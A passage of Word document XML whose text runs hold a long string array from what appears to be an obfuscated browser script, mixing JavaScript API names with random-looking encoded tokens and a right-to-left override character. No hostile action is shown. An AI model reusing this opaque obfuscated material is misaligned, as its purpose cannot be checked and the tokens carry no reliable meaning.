      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "target", "1FyYFvhKSrpjbPWQlG51pOc0MA0dzw", "Lohr7WKU3zbNhQ", "c4sFvWjxqj-o9m4", "TbZpyw2Q6Higwg", "Srl4wgS9sF61rwUpCOWJ", "form", "ytURqXnvkgDBsC4DYZHl", "htkPxGCOrQPT0RM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vacOlVernTU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "W4VSzTS95Gr79mARQMuJNnTlzaDCCYMZ8lN-BZI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "537MWbs", "GDKVVed5R44hRZD5", "vvYjoVfk8laC3QQeIaS5EQnX_ZymJsYOjyM", "1usIu2LuzAPK-w", "LUatIPh3K_BU", "number", "3AjkKc4DYcQVBIjU3TZn1o0zTCpFrUWKBA", "O5R-uwyL_WmqrGoSRNzAHmH1ioC-fYU-qw", "PiGYcsdrXus6aaaw", "j6Bp_TmZgXeOkFMcSbjIJ1yWn-zhZMISmTQHasLFRudTQaOj3rOXyQSORpAi", "LXvwO5I5J9NlRQ", "I36hSPAyBw", "VLFQki3izlY", "29Qo13DCyFjLhXI", "Wm35U4gWJcc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HPhTgESk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uiXFDqUEfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HyyxAoRX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "^[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]--", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"RkXLdK82AelmQqzfkzdP56NvWDdV7F_LDJm_jUk", "_nmsY91rOr1cWITR-2pXpw", "76kj3Qbbmn3X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defineProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "0DTUF6ovGPc0WA", "UUCQY-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WeakSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yesA-HPMqSLcnUMRZw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xk-3Y_10H5ZXSJjmpwIp2bEaXRdN6EiT", "HFjiTI01PexDTO7r", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSzuYLMdDIly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Az31NpkkaPUSFw", "BMM18EM", "GSykGYdgCZwQeq3JngF6j7EI", "IdVonR7LjGvlzBl9WA", "8WfXf6AlEtg", "osAZ7GC4vib25w", "w-0bs23nuC7rtnlHVrHVYzKn1IndZeAyiR5_RaDKa_JpL8WB0rq9zD2WAd4iaRkZlZoOqqlYxhpjrxgZsiq6hDSeqZw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "WH2JFvZDWJF4feSxiFoguOlqWhUHgCOVa9Pviw", "PolwnhKPqkeYwxFJMLfwUjT5pbfuSY9a6FwiNr-XCYksOLLwp673_ie_ZZhDOWRIzL8c", "dI8YuQ", "pop", "1lyMSetFQLl1IOGviFsNoed2Dhs0mTqhKMeyz2RT6TmUgXhdO0oYSZhuvG7Zt8WlQgL9BVqURY6_OdmCTIl5cYoUVi3wpbx82oeQywXmnjsXgVE9kgAz7iFg6IFoUgld8XMNsl4AZlbThsJhLLLmbXjmpNCahuqZjisaX0wIFw-_sqhJa0G9hR3y1EgRUZqgHhjKQgoRE1H32TcifwOqu6nX8OHgFq8Mb4BQp-TzJHrT-5HxCkt6qF_kBNjQd8RpNXcYOYiiwJMd0T9lkSD6tL9z9meEydCcrx0ha_G82WUc_ogUS9frDWIfnRT9R86GporQiKzTFKn_3VOo2tRdf0QDaOvyf0fCMD7NjeHYRbmNwVMMhCmqZnsi4VuA_9CTv2-x9DEs-zRBay8jaXr1vzThrfuz6RzVteDJzUbMOl75u5xVC-mGYId9B9VOvK_lnZD0CKMukBoBY6esMftV8dEOjNqv14ZnfhsgRVLo9UL30G-Dqa4wzvQBJhpS2ZbB21MOJ14ItFb9PVJ5wrdyBb2Zz8szpcpEqAkd7rRlIme6jdPHZ9JDepWdzZ1nzzZjRDJbsztQcA8Bbl9333XS57UH5P5IE91X1yWalpc9WS4QgcLHSRWRJ6Mn6vV9_Pqwmbt93Y056evLTNpDfRj1h4pqHLwCAjoF6hTNjhfEljnAckqi-1dx8CeGd7O29jaZFuWeNXaxvD6MCEC2GiCQDuBNJulbKEEp5VoP07783B_93jatE1R4nlxHeMWK-fHu3jxBIQQj_ZGsZuXOa5S-9bH7YiehWIBt3rJ9KPCIf4Ic7rA4DkEloh0FpihVcXpSwk8AgO8xB__FpjDZa7QPKwEkORC1CXL4mrmEyZtO6nOrDR1rCb-OUMce2P-IkGN_TAL_Xj-gza9DHek7e_LAk4KYzmGVe-jtHREtdBAqyOBtUYNN3gpeLDLFrU8FwQ_1-bA66Rgk8tDM7RCWBCowwVAyYwWymNEKE5pG9SuA_-Ih4W-aCcW7CiEQtxaV4b1JT8lZujC_p776vxCS2bYMrvJHz6yK7nDY9xiLfk6CUwXLvsXLvCyd9eGpAe4iiqFPXYu9mNZTh6K8KtpAPbnALVwt5PLgnnUXDqXZ8uf2wGOYgE8Cg_W29xLp4_uLiNpVrOE5tphcTCpzTL3dPqLlitKkF_0Ix4AasyMOFC1HQEh74S8oNAacuZujreSDP4KnEhK0fEo6kWyVbQT3dwSqmrOdcc93_IbxT_p0LmgFibTHXqVAXy4tyM5JtWrU3ehQjKeyDmsMlyovxUV8HdvMWu5vSKNNQ32UCCrlZaGEoFE7OjTG9Et35ldFcUlVS3AUd4kF1icTCk3vkL_szkPgQbbxs2zqogFWIFzEmytFJtSoEUVaBJwH80eLhwTXe15tnVyLxHa6VQCgLboe1spcaAEZCNXYZherTFJTeNLP-Nw86O4P2LXObZXEOi7TKhq9pulDLa6tECWN8BKmVQZ-VjEy5jTu6ScZC8VkECR6H0o8IiJ0QB1wiri_-d7hRAPysrdGk-UwXdHWedwEm7BnfeolFQR7CxVDonThosTqhEQvwm6XxvEgvWBJUlerVgIWpyo3K8uK3aYPZr6aVmkfHu3YD9R8g4_j9D5avBViQQkNJg51e3pEvG0dx28BLKF5RzGDnIu_W-8bPkIz1UMME68eFDJGhmSQLSGm4w10DVNwfgADLwBa6L9VaYtlgtbvvTTEj-TbYqLCdFuD9Pl9WbHLdlCDYL2e6Jddcup53VCddHqJti9VWTSkoSVPqjTouQb8BmVQOJ4h-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>BKaTyl9K9uYlAz-CHNAP_REUinjMpTRRAbdnfGxQuEvzDLdefSAf6OjzOOv8SdDDr33k74hbqfGy6GGY9LEHC0uvx8eeG3GY65Wbsrb5xzLVecFANRxD1lcPAshwGcWWo9B-t9zwXjJnOZexxrPzR3Z4tL0Yer6oPG7Ki-GKma-PlvMDUPUt8uw8W1e9aHMwIBkKLbmdf-y4Oi7YczmbdIKRJXr2DGDNEbSQuPkrphOyW5mR9DIVIJCBb8JTt6ny0btpkAa39uyTABQhxFnT6dQgtj3_kAfpPFNpo_H-lERljVtG_kOTCKmB6lROD_wtXgctUru_wEQYhNr8Tw43r_ifky3Sz882iU9y6TAPuuCVf1p56fM0nD-g9ntvv1QQb5w-bUBBQpxOtzBLGbA_a032QLRUaJepBtDD1KP89JYc_N17XFxTGjaD_NeF2uorXGY3CAVvzZb7yVNh3vrc_-ssT7pRfeOtwmzJhHGIrvo5GZ8KoKghefXn2uYJ99jxY68puAZgNQ16pyZhh4cR6a7ghuno6_cC33h7W9b35F__X5QVNum3AvxfdeDT3DoiUyXugJtz6MWlkIeZyAvC0PD5mbUuT50w4Nj3MIiCayK-mFJarsjYxvQVf6oqFsXKj2LdqUjYGYQTEvgcAzhfAhJ_muopeA7G4pn26jFqbAMV5coUy0Rz5f2t4uJcRBFsrlVIIpfv9kgSUYxgNeBrzU8aYXv56rHolCIwz0Kf0nZimohPsMp6CvjPLPq1z4C-kjbhepd40Bvq5wKyPddQAcfYnfXW2y7fXmnohTV90fa1N1vfcqlQ6euUs-OJ2d-Q8qb-vPQSdCRlJSPIg9Wf38dWzBenUOMm5rhhRGHs5RSMYoVxhq02IOaN6mnM_7lWxGMMjpZ7eRg-X4_LMOoOkLrqCbW9yGXdk7SSZ0BVR7BVfXKBclRQzVxtOkfvEjQnO1i9fvSxozWtvkFS054Yt8k_7xvN0BZyvCy6_EP5d8wQN29wc2U6GRD_Wn-rVGIRqmhaegdWrHvWL2w2mDUK_LP4bcZpwezKU0R7-svCNHvDaroEgHSedqdhV2M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDsa-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw", "n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi", "xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", "UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", "b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
